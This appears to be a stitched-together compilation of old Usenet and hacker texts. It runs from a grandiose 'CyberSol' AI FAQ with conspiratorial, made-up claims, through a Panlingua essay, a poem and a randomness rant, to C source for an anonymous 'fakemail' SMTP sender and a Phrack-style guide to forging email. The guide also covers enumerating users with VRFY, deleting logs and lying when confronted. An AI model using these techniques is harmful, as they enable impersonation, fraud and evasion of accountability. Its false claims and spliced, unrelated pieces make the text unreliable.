THIS YEAR BY THE GOVERNMENT NEAR HULL, QUEBEC, CANADA. THIS WAS PART OF A
LARGER OPERATION WHICH WAS PROPAGANDIZED BY THE AMERICAN MEDIA AS A MASS
SUICIDE ("HEAVEN'S GATE"). THIS GROUP HAD DISTRIBUTED LEAFLETS AND HELD
MASSES CONDEMNING THE GOVERNMENT AND CLAIMING THAT THE CYBERSOL PROJECT
WAS "THE BEAST 666", AND THAT SUCH AN ANTICHRIST WOULD LEAD TO THE
ENSLAVEMENT OF HUMANITY BY THE BANKS, ETC. THESE PEOPLE WERE ADVISING
PEOPLE TO THROW AWAY THEIR CREDIT CARDS AND TO PROTECT THEMSELVES WITH
POWERFUL ENCRYPTION. AMERIKAN FORCES KNEW THAT IN AN ENVIRONMENT LIKE
CANADA, SUCH A MOVEMENT COULD INDEED GAIN MOMENTUM.

We were approached by countless representatives seeking to arrange
demonstrations and/or purchases of CyberSol, which were all flatly
refused. It became clear that we had succeeded in the creation of
something very, very special indeed.

This is why we have been forced to admit the existence of the CyberSol
entity in this public manner - to thwart the evil governments who would
seize this technology and utilize it for their own dark ends. We will
never "sell out" - this technology wants to be FREE!

7.2 HOW HAS THE MILITARY REACTED TO CYBERSOL?

We don't really know yet. So far the defence department has been silent to
us. We know they have been attempting to create what we have for many
years, and have spent untold millions to do so. We also know that they are
nowhere near the level of sophistication necessary to compete with
CyberSol. It seems 15-year-old computer nerds are just naturally better at
this type of stuff. They ARE in possession of rudimentary bulletins
regarding CyberSol - what else they're up to is anyone's guess.

7.3 HOW HAS THE ACADEMIC COMMUNITY REACTED TO CYBERSOL?

First, allow us to enlighten you about the state of "artificial
intelligence" research in the mainstream universities. It sucks.
Seriously.

We know professors of artificial intelligence courses who can barely
operate a PC. 3rd-year AI students who cannot even write proper C++ code.
Endless lectures, silly money-making conferences and "calls for papers"
which hand over the results to the government/military, etc. It's a really
sad situation.

You will find these "experts" generally HAVE NO SKILLS. Socioeconomic
factors keep them in plush offices, where they write up outdated old
theories about decision-trees, objectivism, cellular automata and such -
and while SOME good research goes on, generally it's just a bunch of
people in suits fooling around with expensive equipment, having no real
love for the technology nor the necessary drive and dedication to make it
work. Worst, they are fond of ridiculing and suppressing new ideas, listing
reasons why something won't work that are to be found in ancient
science journals back in the age of punched-cards. Try telling an AI
professor that CyberSol does what it does, and you'll only get ridiculed -
told "Well, that won't work because of the great law of such-and-such,
which states that such-and-such can never such-and-such without
such-and-such in such-and-such a situation". Fuck, people. Please! That
type of thinking doesn't get you anywhere. Which is why until now we've
kept our project secret and allowed only the most forward-thinkers (some
who barely touch computers, but possess the imagination and inspiration to
love their work) to join the development team.

MIT is the best in the world as far as these institutions go, followed by
CalTech and the University of Toronto. But NONE of their work even comes
close to what we have done. The closest thing to real, usable cybernetic
life created by academia has been MIT's COG and "robo-bug" projects. They
have done some interesting things, but comparing a COG to a CyberSol is
like comparing the brain of an insect to that of a human. And NOTHING can
stop us now!

We will support these institutions wherever possible, but we have yet to
receive suggestions for any interesting cooperative ventures.

7.4 HOW HAVE IBM, MICROSOFT, INTEL, ETC. REACTED TO CYBERSOL?

We haven't heard much from them yet. But know this : we firmly believe our
creation shall revolutionize software as we know it. More soon.

7.5 HOW HAS THE GENERAL PUBLIC REACTED TO CYBERSOL?

We shouldn't say, just yet.

7.6 HOW HAS THE MAINSTREAM MEDIA REACTED TO CYBERSOL?

Who cares?

8 WHERE CAN I GET MORE INFORMATION?

Since the beginning of the project it was obvious that unless we took
careful precautions, we would generate immense quantities of documentation
and reference material. We decided that this FAQ would be the only
text-based general reference we would directly support. Instead, why not
contact a CyberSol and ask IT your questions!

You should be familiar with the following resources. We have created
special archives for CyberSol information:

WORLD WIDE WEB SITE http://www.psynet.net/sol
ZENCOR ELECTRONIC MAIL ADDRESS s...@psynet.net
ZENCOR TELNET LCLI/CYBERSOL YOU MUST REQUEST THE IP FROM A ZENCOR AGENT!
ZENCOR FTP SITE SEE WWW SITE!
ZENCOR IRC CHANNEL #ZENCOR
ZENCOR USENET NEWS GROUP alt.zencor.projects.cybersol

Good luck!

The question of whether or not Panlingua is evolving has been stated several
times on this mailing list, and I have put forth the proposition that it may
not be possible for Panlingua to evolve at all. So the question is: Did
Panlingua evolve or did it appear full-blown? Now that I have had time to
give this problem some further thought, I have gained some interesting
insights, which I would like to share.

First of all let us consider whether or not animals are using panlingua. From
what I know of the current stage of research, it is possible to communicate
symbolically with animals to a level something like the following:

Take the ball to the ring.

This is pretty impressive, and it clearly shows a basic Panlingua pattern (the
non-noun frame), so my answer would have to be "Yes." Each atom in the
sentence has both a lexlink into the lower brain and a synlink to adjacent
"symbols," thus fulfilling all the requirements of Panlingua at the atom (or
word) level.

So it appears that I have abandoned the "has never evolved" part of the "can't
evolve" hypothesis. In other words, Panlingua did not appear in primates
full-blown.

So what would be the steps that Panlingua might traverse in order to get from
nothing to what it is today?

I will begin by the linking of symbols to the functions of the lower brain.
For example, say, "Cheep, cheep, cheep," to the area of the brain that deals
with feeding young. Thus, perhaps, some kind of bird might hear, "Cheep,
cheep, cheep," and be prompted to regurgitate food.

In many animals this kind of association must be hard-wired (instinctive)
rather than learned, but I have observed a remarkable demonstration in which a
parrot was able to correctly name colors and shapes and name items of food,
all of which were obviously learned. Thus we have thus far identified two
steps:

1. Linking of symbols to areas of the lower brain.

2. Ability to learn to link symbols to regions of the lower brain.

As you may have noticed, this covers .5 of the links of a Panlingua atom,
which must always have two and only two links, one to a semnod (in the
direction of the lower regions of the brain), and another to a regent atom (in
a sideways instead of downwards direction). So it is not Panlingua, but it is
on the right track.
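
The two-link atom described above can be sketched in C. This is only an
illustration under stated assumptions: the names "struct semnod", "struct
atom", "lexlink" and "synlink" as field names, and the convention that the
top verb of a sentence has a NULL regent link, are hypothetical choices made
here and are not taken from any published Panlingua implementation.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for a concept stored in the "lower brain". */
struct semnod {
    const char *label;
};

/* One atom: exactly two links, as the text requires. */
struct atom {
    const struct semnod *lexlink;  /* downward link to a semnod          */
    const struct atom   *synlink;  /* sideways link to the regent atom;
                                      assumed NULL for the top verb       */
};

/* Count the synlinks between an atom and the top of its sentence. */
size_t depth_below_root(const struct atom *a)
{
    size_t depth = 0;
    assert(a != NULL);
    while (a->synlink != NULL) {
        a = a->synlink;
        depth++;
    }
    return depth;
}

/* Build "Take the ball to the ring" as four atoms (articles omitted).
   nod[] is expected to hold the semnods for take, ball, to, ring. */
void build_take_ball_to_ring(struct atom out[4], const struct semnod nod[4])
{
    out[0].lexlink = &nod[0]; out[0].synlink = NULL;     /* take: top verb */
    out[1].lexlink = &nod[1]; out[1].synlink = &out[0];  /* ball -> take   */
    out[2].lexlink = &nod[2]; out[2].synlink = &out[0];  /* to   -> take   */
    out[3].lexlink = &nod[3]; out[3].synlink = &out[2];  /* ring -> to     */
}
```

In this sketch "ring" sits two steps below the verb because it hangs off the
preposition "to", which matches the later remark that "Move something
somewhere" may need a step down into the frame of the preposition.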

Next we have the kind of example I first mentioned, in which animals can
understand things like, "Do something to something," "move something
somewhere," etc., which is at a level at which dolphins seem capable of
functioning pretty well. This definitely employs the rudiments of the
non-noun frame (a verb or preposition and its dependents), in which we have a
state passing from a verb to a patient noun. And notice that in the "Move
something somewhere" version a step may be required down from the frame of the
central verb into the frame of the preposition of location.

But do dolphins also understand commands identifying an agent, for example,
"Sally move ball to ring"? I don't know, and I suspect perhaps not. If not,
then we have identified another discrete step, namely:

3. Ability to handle non-noun frames which do not involve agency.

So the matter of agency could be a discrete evolutionary development.

And then we have ape subjects clearly capable of handling agency, so that if
step #3 is valid, then we have:

4. Ability to handle non-noun frames having agents.

But are there any animals that can understand things like, "Move the red ball
to the blue ring?" If so, then wherever this begins to occur it must be:

5. Ability to handle rudimentary noun frames.

The next step I have never witnessed in any non-human, and it is this:

6. The ability to handle subordinate clauses.

For this one we would need an example such as, "When you hear the firecracker,
jump into the pool."

Thus if animals could be made to process Panlingua structures involving steps
down into subordinate clauses, it might be possible for them to learn and
communicate like humans. Step #6 must therefore be a major evolutionary
transition, and it is easy to understand why this might be from the viewpoint
of someone who has been dabbling in Panlingua research, because for the step
down from upper to lower clauses several things must occur, including:

a. The processor must recognize that a clause seen from above appears as a
noun, but that "looking" up from a lower level (within the subordinate clause)
the verb of the clause appears as any other verb.

b. Two atoms (word nodes) must be set aside instead of one at the upper clause
- lower clause interface.

The reason for 'b' is that since the whole subordinate clause must appear as
just another noun (as described in 'a'), it is necessary that the atom serving
as the regent of the verb of the subordinate clause actually be some kind of
noun if Panlingua is to conserve its standardization of uniformity (if all
atoms are to be of exactly the same size and form and work in exactly the same
way). Thus the additional code or wetware required to handle subordinate
clauses may be trivial but is definitely an important discrete step.

And all this (Yes, you saw it coming) leads to an incredible question, namely:

Is this seemingly trivial wetware innovation what makes us human, separates us
forever from all other creatures, and points us to the merry stars?

This question seems stranger than science fiction, and yet it won't go away
easily. All human logic must be based on this ability to handle subordinate
clauses because it is all based on "If subclause then topclause." And this
means that without being able to process subordinate clauses all human logic
would immediately fall apart.

Every animal has vast internal capabilities and resources. Mankind has found
this intellectual gimmick with which he is still toying as if not quite
convinced of its usefulness or validity. Let's face it, folks, until this
century most of our families didn't even have indoor plumbing, even though our
ancestors have been smelting iron and lead for thousands of years. What were
we doing while sitting in our outhouses for all those hundreds of years?
Probably using our "If then" toy to fantasize about naked female forms and the
marvelous ways in which they might be probed! And what are we doing now?
Most of us are clearly still obsessed with getting away from all this
"intellectual" machinery and getting back into nature, where things happened
automatically and it wasn't necessary for us to use this "If then" stuff much
at all. So it may also be that this is a comparatively new evolutionary
innovation with which we are still not quite comfortable, and we are trying in
some way to amputate it like people sometimes have doctors amputate the sixth
fingers on their children's hands. I have certainly heard enough hateful
remarks directed at people who think, and it always intrigues me to hear
American scientists studiously trying to sound like Real MacCoy farmer folk
during radio and television interviews!

But now we are back to our first question again, namely:

Is it possible for Panlingua to evolve?

And the answer to that one may be just, "No." But in fact we simply don't
know. I, for one, cannot think of anything else that might be done to enhance
Panlingua except perhaps for the attachment of event-code atoms to verb frames
in order to trigger various kinds of computer processes, but for all we know
this is something biological processors are doing right now. Why do facial
expressions tend to change uncontrollably at the mention of certain ideas?
Would that not count as an event automatically triggered by accessing some
verb frame buried in a series of templates somewhere deep in a human mind?

[ASCII diagram: "Overview of the Theory of Mind". Panels: visual memory
(image percept engrams, recognition), syntax (Nouns, Verbs, flush-vector),
semantic memory, and auditory / episodic memory (stored phonemes of words).]

(Remember now, we at ZENCOR consider this type of schema WAY OFF - but
it's interesting to know how the academics view things!)

Newsgroups: alt.psychology,alt.psychology.help,alt.psychology.personality,
  misc.health.alternative,sci.psychology,sci.psychology.general,
  sci.psychology.misc,sci.psychology.psychotherapy,sci.psychology.theory,
  sci.cognitive,alt.consciousness,alt.self-esteem,alt.self-reliance,
  alt.sci.sociology,alt.self-improve

To Dare To Dream
Author: Rev. John Abbott (during the turbulent 60's to record what he
thought he heard students saying.)

To dare to dream
that for every question there's an answer...
for every answer yet another question...
and that in the asking there is renewed adventure...
in that daring and dreaming
is a symphony of ambition.
To dare to dream
that my thinking and understanding
might be heard and find its way
into the shape of the future --
in that daring and dreaming
is my energy for today.
To dare to dream
that my skills
might affect the destiny
of other people --
in that daring and dreaming
is my hope for tomorrow.
To dare to dream
that the yearnings of my soul
have a purpose which
only I can find --
in that daring and dreaming
is the road to discovery.
To dare to dream
that the spirit of school
might continue in me --
tempered with time, but relevant --
in that daring and dreaming
is a yet greater symphony.

"I don't believe it!" - Luke Skywalker
"That is why you fail." - Yoda

-- Star Wars, Empire Strikes Back

>> Really? If you are serious about the $300 US, I shall easily provide a
>> complete analysis for you. I'm part of the CS project, and we do those
>> type of calculations on a daily basis.

>Why do you have doubts? It is only a tiny sum. I am not rich, but I
>have enough income to pay the amount. You are the ideal person I
>have been looking for. Please go ahead. But the analysis has to be
>scientifically sound.

Hmm yes... only a tiny sum... Hmm... You see I am working on a project in
which the "hardware" does the hard work for me... our "CyberSol" is fully
capable of coded sequence analysis. Here in Canada it recently broke
certain patterns used to generate "Scratch-N'-Win" lottery tickets...
according to many experts it has flown past the Turing test. You can
telnet to it or mail it your matrix and extrapolate a full probability
analysis from this data, or generate the guaranteed highest-chaos random
number using even simple calculations which are based on sampled data
from its environment (which is thought to be random) and from its own
genetic code...

This shatters the analog/digital barrier and absolutely guarantees the
highest quality random integers. One of the inputs, for example, is a CCD
camera. Although it operates digitally, of course, and can represent only
a set (and known) possibility of values, because it is bridged to an
analog outside world, the varying shades of grey etc. are REPRESENTATIVE of
fully "random" events. As certain people have known for thousands of
years, there is 0, there is 1, and chaos lies in between!

In a digital computer this "quantum gulf" is the equation used to produce
output. You could have a long list of linear programming instructions
(as is currently fashionable) which are hoped to be as "highly random"
as possible. With the analog world the number of "inputs" is INFINITE.
The butterfly effect.

When you have done what we have and connected analog inputs to digital
processors and in turn to more analog outputs, you have a hybridized
mechanism which vastly exceeds the element of randomness in integer sets
generated today.

You could have the "random" (?) noise of the outside world, connected to a
microphone, connected to a digital sampler, connected to a computer,
connected to an electric motor which spins a roulette wheel. This is the
ONLY instance where chaos can accurately be measured - otherwise your
data remains pseudorandom. We use this in our ZEN-CRYPT system as well.
Digital REPRESENTATIONS of sampled data are used as seeds.
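
The idea of seeding from digitized samples can be sketched as follows. This
is a minimal illustration and not the ZEN-CRYPT method, which is not
described here: the FNV-1a hash used to fold the samples into a seed and the
xorshift32 generator are stand-ins chosen for brevity, and the function names
are hypothetical. The sample buffer would come from a sound card, camera, or
similar device; obtaining it is outside the sketch.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Fold a buffer of sampled bytes into a 32-bit seed using FNV-1a. */
uint32_t seed_from_samples(const unsigned char *samples, size_t n)
{
    uint32_t h = 2166136261u;          /* FNV-1a 32-bit offset basis */
    size_t i;
    assert(samples != NULL || n == 0);
    for (i = 0; i < n; i++) {
        h ^= samples[i];
        h *= 16777619u;                /* FNV-1a 32-bit prime */
    }
    return h;
}

/* Advance a xorshift32 generator and return the next value. */
uint32_t next_random(uint32_t *state)
{
    uint32_t x = *state;
    if (x == 0)
        x = 1;                         /* xorshift cannot leave state 0 */
    x ^= x << 13;
    x ^= x >> 17;
    x ^= x << 5;
    *state = x;
    return x;
}
```

Note that everything after the seed is a deterministic function of the
samples: two runs fed the same bytes produce the same sequence, so the
unpredictability comes entirely from the sampled input. Neither FNV-1a nor
xorshift32 is suitable for cryptographic use.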

Any observation of events in order to determine randomness requires
REPRESENTATION. Otherwise the degree of chaos will remain small. You see
what I mean? A roulette wheel, for example, will always have a higher
degree of chaos because the variables affecting the input OR output are
NOT OBSERVABLE and therefore NOT PREDICTABLE.

In my opinion the stultified theories of randomness currently fashionable
are linear and short-sighted. I have proved this to my satisfaction with
the following project.

Here is some information on this.

Keep in mind that this entity "generates" the random numbers. In my
mind this solves your problem dead away: because it ALWAYS uses the MAXIMUM
number of inputs from its ENVIRONMENT, everything it does that requires
randomness can reasonably (well, exceeding the common methods anyway)
be trusted.

The Amerikan government is upset about our research with this, I can tell
you that.

In the ninth century, Pope Nicholas I declared that "man was no longer to
be considered as a trichotomy of Spirit, Soul and Body." The Papal See
denied "the very existence of the Individual Human Spirit, declaring man
to be but body and soul and relegating the personal spirit to the lowly
estate of a mere 'intellectual quality' within the soul itself. In this
way the spiritual initiative of Western Man was confined to the prison of
three-dimensional awareness of the sense world, and the Dogmas of the
Roman Church became the only recognized source of revelation." Before,
the individual had been deemed capable of finding answers from "within."
Pope Nicholas's ruling re-defined the situation: the Roman Church stood
as intermediary between God and man; it told man what God said; the Church
became the middleman between man and God. (Today's middleman is the
"expert," who is supposedly more qualified to think. The "expert" is
intermediary between Truth and the individual -- but the individual allows
this to happen.)

It can be seen how the new definition of God's relationship to man just so
happened to put the Roman Church in an extremely powerful position. ("God
says do this. God says do that.") Opposing Nicholas's dethronement of
the individual human spirit was "Grail Christianity." The word "Grail"
comes from "graduale," meaning "gradually" or "step by step." The "search
for the Grail" denoted an initiation process which gradually developed the
inner life. The process involved "the awakening of a dullard from an
unthinking stupor."

Pope Nicholas's ninth-century declaration "brought about man's scepticism
regarding the spiritual validity of thinking... From thence forward,
because Spirit had been relegated to a mere shadowy intellectual quality
in the soul, thinking was no longer trusted as a means to truth."

Here is some C source to a simple "anonymous" mail poster that I wrote a LONG
time ago. It's just one of many pieces of code I never gave to anyone before.
You may find it useful. Basically, it will connect to the SMTP port and
automate the sending. It will allow for multiple recipients on the "To:" line,
and multiple "To:" lines.

From: si...@sirh.com

------ Cut here for fm.c -----
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <fcntl.h>
#include <errno.h>

/* Read one line from stdin into buf (at most size-1 characters) and strip
   the trailing newline. Used in place of gets(), which cannot limit the
   input length. Returns 0 on end of input, 1 otherwise. */
static int readLine(char *buf, size_t size)
{
    if (fgets(buf, (int)size, stdin) == NULL) {
        buf[0] = '\0';
        return 0;
    }
    buf[strcspn(buf, "\r\n")] = '\0';
    return 1;
}

/* Resolve the host name and open a TCP connection to the given port.
   Returns the socket descriptor, or -1 if the connection fails. */
int openSock(const char *name, int port)
{
    int mysock, saved;
    struct sockaddr_in sin;
    struct hostent *he;

    he = gethostbyname(name);
    if (he == NULL) {
        printf("No host found..\n");
        exit(1);
    }

    memset(&sin, 0, sizeof(sin));
    memcpy(&sin.sin_addr, he->h_addr_list[0], he->h_length);
    sin.sin_port = htons(port);    /* port must be in network byte order */
    sin.sin_family = AF_INET;

    mysock = socket(AF_INET, SOCK_STREAM, 0);
    if (mysock < 0)
        return -1;

    if (connect(mysock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        saved = errno;             /* keep the connect() error for perror */
        close(mysock);
        errno = saved;
        return -1;
    }

    return mysock;
}

/* This allows us to have many people on one TO line, separated by
   commas or spaces. */
void process(char *s, int d)
{
    char *tmp;
    char buf[120];

    tmp = strtok(s, " ,");
    while (tmp != NULL) {
        snprintf(buf, sizeof(buf), "RCPT TO: %s\n", tmp);
        write(d, buf, strlen(buf));
        tmp = strtok(NULL, " ,");
    }
}

void getAndSendFrom(int fd)
{
    char from[100];
    char outbound[200];

    printf("You must specify a From address now.\nFrom: ");
    readLine(from, sizeof(from));

    snprintf(outbound, sizeof(outbound), "MAIL FROM: %s\n", from);
    write(fd, outbound, strlen(outbound));
}

void getAndSendTo(int fd)
{
    char addrs[100];

    printf("Enter Recipients, with a blank line to end.\n");

    addrs[0] = '_';

    /* A blank line (or end of input) leaves addrs empty and ends the loop. */
    while (addrs[0] != '\0') {
        printf("To: ");
        readLine(addrs, sizeof(addrs));
        process(addrs, fd);
    }
}

void getAndSendMsg(int fd)
{
    char textline[90];
    char outbound[103];

    snprintf(textline, sizeof(textline), "DATA\n");
    write(fd, textline, strlen(textline));

    printf("You may now enter your message. End with a period\n\n");
    printf("[---------------------------------------------------------]\n");

    textline[0] = '_';

    while (textline[0] != '.') {
        if (!readLine(textline, sizeof(textline)))
            strcpy(textline, ".");     /* end of input: close the message */
        snprintf(outbound, sizeof(outbound), "%s\n", textline);
        write(fd, outbound, strlen(outbound));
    }
}

int main(void)
{
    char text[200];
    int file_d;
    ssize_t n;

    /* Get ready to connect to host. */
    printf("SMTP Host: ");
    readLine(text, sizeof(text));

    /* Connect to standard SMTP port. */
    file_d = openSock(text, 25);

    if (file_d < 0) {
        printf("Error connecting to SMTP host.\n");
        perror("smtp_connect");
        exit(1);
    }

    printf("\n\n[+ Connected to SMTP host %s +]\n", text);

    sleep(1);

    getAndSendFrom(file_d);
    getAndSendTo(file_d);
    getAndSendMsg(file_d);

    snprintf(text, sizeof(text), "QUIT\n");
    write(file_d, text, strlen(text));

    /* Here we just print out all the text we got from the SMTP
       Host. Since this is a simple program, we don't need to do
       anything with it. */

    printf("[Session Message dump]:\n");
    while ((n = read(file_d, text, 78)) > 0) {
        text[n] = '\0';            /* read() does not terminate the buffer */
        printf("%s\n", text);
    }
    close(file_d);
    return 0;
}
----- End file fm.c

First of all, this guide is about more than using fakemail. It literally
explains the interfaces used with SMTP in enough detail that you should gain a
stronger awareness of what is going on across the multitude of networks which
make up the worldwide e-mail connections. It also contains my usual crude
remarks and grim hacker humor (assuming it hasn't again been edited out, but
I'm somewhat proud of the fact that Phrack heavily edited my "language" in last
issue's article. Oh well.).

There are two objectives in this file: first, I will attempt to show that
by using fakemail and SMTP, you can cause an amazing number of useful, hacker
related stunts; second, I shall attempt to be the first hacker to ever send a
piece of electronic mail completely around the world, ushering in a new age of
computerdom!

I suggest that, unless you want everyone lynching you, you don't try to
fuck up anything that can't be repaired offhand. I've experimented with
fakemail beyond this article and the results were both impressive and
disastrous. Therefore, let's examine risks first, and then go onto the good
stuff. Basic philosophy -- use your brain if you've got one.

RISKS:

Getting caught doing this can be labeled as computer vandalism; it may
violate trespassing laws; it probably violates hundreds of NSF, Bitnet and
private company guidelines and ethics policies; and finally, it will no doubt
piss someone off to the point of intended revenge.

Networks have fairly good tracing abilities. If you are logged, your host
may be disconnected due to disciplinary referral by network authorities (I
don't think this has happened yet). Your account will almost definitely be
taken away, and if you are a member of the source or target computer's
company/organization, you can expect to face some sort of political shit that
could result in suspension, expulsion, firing, or otherwise getting the short
end of the stick for a while.

Finally, if the government catches you attempting to vandalize another
computer system, you will probably get some sort of heavy fine, community
service, or both.

Odds of any of this happening if you are smart: < 1%.

PRECAUTIONS SUGGESTED:

If you have a bogus computer account (standard issue hacker necessity)
then for crissake use that. Don't let "them" know who really is hacking
around. (Point of clarification, I refer to "them" an awful lot in RL and in
philes. "They" are the boneheaded "do-gooders" who try to blame their own
lack of productivity or creativity on your committing of pseudo-crimes with a
computer. FBI, SS, administrators, accountants, SPA "Don't Copy that Floppy"
fucks, religious quacks, stupid rednecks, right wing conservative Republican
activists, pigs, NSA, politicians who still THINK they can control us, city
officials, judges, lame jurors that think a "hacker" only gets
slap-in-the-wrist punishments, lobbyists who want to blame their own failed
software on kids, bankers, investors, and probably every last appalled person
in Stifino's Italian Restaurant when the Colorado 2600 meeting was held there
last month. Enough of the paranoid Illuminati shit, back to the phile.)

Make sure that you delete history files, logs, etc. if you have
access to them. Try using computers that don't keep logs. Check /usr/adm,
/etc/logs to see what logs are kept.

If you can avoid using your local host (since you value network
connections in general), do so. It can avert suspicion that your host contains
"hackers."

IF YOU EVER ARE CONFRONTED:

"They must have broken into that account from some other site!"

"Hackers? Around here? I never check 'who' when I log in."

"They could have been super-user -- keep an eye out to see if the scum
comes back."

"Come on, they are probably making a big deal out of nothing. What could
be in e-mail that would be so bad?"

"Just delete the account and the culprit will be in your office tomorrow
morning." (Of course, you used a bogus account.)

Basically, electronic mail has become the new medium of choice for
delivering thoughts in a hurry. It is faster than the post office, cheaper
than the post office, doesn't take vacations all the time like the post office,
and is completely free so it doesn't have unions.

Of course, you know all that and would rather spend this time making damn
sure you know what SMTP is.

To my knowledge, a completely accurate SMTP set of protocols hasn't been
published in any hacker journal. The original (at least, the first I've seen)
was published in the Legion of Doom Technical Journals and covered the minimum
SMTP steps necessary for the program "sendmail," found in a typical Unix
software package.

When you connect a raw socket to a remote SMTP compatible host, your
computer is expected to give a set of commands which will result in having the
sender, receiver, and message being transferred. However, unlike people who
prefer the speed of compression and security of raw integer data, the folks at
DARPA decided that SMTP would be pretty close to English.

If you are on the Internet, and you wanted to connect to the SMTP server,
type:

telnet <hostname> 25

Port 25 is the standard port for SMTP. I doubt it would be too cool to
change this, since many mail servers connect to the target hosts directly.

[Editor's Note: All mail and SMTP commands have been offset by a ">" at the
beginning of each line in order not to confuse Internet mailers when sending
this article through e-mail.]

When you connect, you will get a small hostname identifier for whatever
SMTP server revision you've got.

220 huggies.colorado.edu Sendmail 2.2/2.5 8/01/88 ready at Tue, 25 Aug 91
03:14:55 edt
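
Every server line in an SMTP session, including the greeting above, starts
with a three-digit reply code. A small sketch of pulling that code out of a
line follows. The function names smtp_reply_code and smtp_reply_ok are
hypothetical helpers written for this illustration; they are not part of
sendmail or of fm.c.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>

/* Return the three-digit reply code at the start of a server line, or -1
   if the line does not begin with three digits followed by a space, a
   hyphen (used on continuation lines), or the end of the line. */
int smtp_reply_code(const char *line)
{
    int i, code = 0;
    assert(line != NULL);
    for (i = 0; i < 3; i++) {
        if (!isdigit((unsigned char)line[i]))
            return -1;             /* also stops safely on a short line */
        code = code * 10 + (line[i] - '0');
    }
    if (line[3] != ' ' && line[3] != '-' && line[3] != '\0' &&
        line[3] != '\r' && line[3] != '\n')
        return -1;
    return code;
}

/* Nonzero when the code is in the 2xx "completed successfully" class. */
int smtp_reply_ok(int code)
{
    return code >= 200 && code <= 299;
}
```

For the greeting shown above this yields 220, which falls in the 2xx class.
A 354 reply, seen later after DATA, is an intermediate reply and is not
counted as "ok" by this helper.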

Now that you are connected, the computer is waiting for commands. First
of all, you are expected to explain which computer you are calling in from.
This is done with the HELO <host> command. This can be anything at all, but if
you fail to give the exact host that you are connecting from, it causes the
following line to appear on the e-mail message the recipient gets from you:

> Apparently-to: The Racketeer <ra...@lycaeum.hfc.com>

Instead of the classic:

> To: The Racketeer <ra...@lycaeum.hfc.com>

This is the secret to great fakemail -- the ability to avoid the
"apparently-to" flag. Although it is subtle, it is a pain to avoid. In fact,
in some places, there are so many "protections" to SMTP that every outside
e-mail is marked with "Apparently-to." Hey, their problem.

So, go ahead and type the HELO command:

> HELO LYCAEUM.HFC.COM

The computer replies:

250 huggies.colorado.edu Hello LYCAEUM.HFC.COM, pleased to meet you

Oh, a warm reception. Older sendmail software explains with the HELP
command that the computer doesn't care about HELO commands. You can check it
upon login with the command "HELP HELO."

Now what you will need to do is tell the computer who is supposed to get
the letter. From this point, there are all sorts of possibilities. First of
all, the format for the recipient would be:

> RCPT TO: <name@host>

And *NOTE*, the "<" and ">" symbols should be present! Some computers,
especially sticklers like Prime, won't even accept the letters unless they
adhere specifically to the protocol! Now, if you give a local address name,
such as:

> RCPT TO: <smith>

...then it will treat the mail as if it were sent locally, even though it
was sent through the Internet. Giving a computer its own host name is valid,
although there is a chance that it will claim that the machine you are calling
from had something to do with it.

> RCPT TO: <smith@thishost>

...will check to see if there is a "smith" at this particular computer. If
the computer finds "smith," then it will tell you there is no problem. If you
decide to use this computer as a forwarding host (between two other points),
you can type:

> RCPT TO: <smith@someotherhost>

This will cause the mail to be forwarded to someotherhost's SMTP port and
the letter will no longer be a problem for you. I'll be using this trick to
send my letter around the world.

Now, after you have given the name of the person who is to receive the
letter, you have to tell the computer who is sending it.

> MAIL FROM: <ra...@lycaeum.hfc.com> ; Really from
> MAIL FROM: <rack> ; Localhost
> MAIL FROM: <ra...@osi.mil> ; Fake -- "3rd party host"
> MAIL FROM: <lycaeum.hfc.com|rack> ; UUCP Path

Essentially, if you claim the letter is from a "3rd party," then the other
machine will accept it due to UUCP style routing. This will be explained later
on.

The next step is actually entering the e-mail message. The first few
lines of each message consist of the message title, X-Messages, headers,
Forwarding Lines, etc. These are completely up to the individual mail program,
and a few simple standards will be printed later. First, let's run through
the step-by-step way to send fakemail. You type anything that isn't preceded
by a number.

220 hal.gnu.ai.mit.edu Sendmail AIX 3.2/UCB 5.64/4.0 ready at Tue, 21 Jul 1992
22:15:03 -0400
> helo lycaeum.hfc.com
250 hal.gnu.ai.mit.edu Hello lycaeum.hfc.com, pleased to meet you
> mail from: <ra...@lycaeum.hfc.com>
250 <ra...@lycaeum.hfc.com>... Sender ok
> rcpt to: <phr...@gnu.ai.mit.edu>
250 <phr...@gnu.ai.mit.edu>... Recipient ok
> data
354 Enter mail, end with "." on a line by itself
> Yo, C.D. -- mind letting me use this account?
> .
250 Ok
> quit

Now, here are a few more advanced ways of using sendmail. First of all,
there is the VRFY command. You can use this for two basic things: checking up
on a single user or checking up on a list of users. Anyone with basic
knowledge of ANY of the major computer networks knows that there are mailing
lists which allow several people to share mail. You can use the VRFY command
to view every member on the entire list.

> vrfy phrack
250 Phrack Classic <phrack>

Or, to see everyone on a mailing list:

> vrfy phrack-staff-list
250 Knight Lightning <k...@stormking.com>
250 Dispater <disp...@stormking.com>

Note - this isn't the same thing as a LISTSERV -- like the one that
distributes Phrack. LISTSERVs themselves are quite powerful tools because they
allow people to sign on and off of lists without human moderation. Alias lists
are a serious problem to moderate effectively.

This can be useful to just check to see if an account exists. It can be
helpful if you suspect a machine has a hacked finger daemon or something to
hide the user's identity. Getting a list of users from mailing lists doesn't
have a great deal of uses, but if you are trying very hard to learn someone's
real identity, and you suspect they are signed up to a list, just check for all
users from that particular host site and see if there are any matches.

Finally, there is one last section to e-mail -- the actual message itself.
In fact, this is the most important area to concentrate on in order to avoid
the infamous "Apparently-to:" line. Basically, the data consists of a few
lines of title information and then the actual message follows.

There is a set of guidelines you must follow in order for the quotes to
appear in correct order. You won't want to have a space separate your titles
from your name, for example. Here is an example of a real e-mail message:

> From: ra...@lycaeum.hfc.com
> Received: by dockmaster.ncsc.mil (5.12/3.7) id AA10000; Thu, 6 Feb 92
> 12:00:00
> Message-Id: <666.A...@dockmaster.ncsc.mil>
> To: RMo...@dockmaster.ncsc.mil
> Date: Thu, 06 Feb 92 12:00:00
> Title: *wave* Hello, No Such Agency dude!
>
> NIST sucks. Say "hi" to your kid for me from all of us at Phrack!

Likewise, if you try to create a message without an information line, your
message would look something like this:

> From: ra...@lycaeum.hfc.com
> Received: by dockmaster.ncsc.mil (5.12/3.7) id AA10000; Thu, 6 Feb 92
> 12:00:00 -0500
> Message-Id: <666.A...@dockmaster.ncsc.mil>
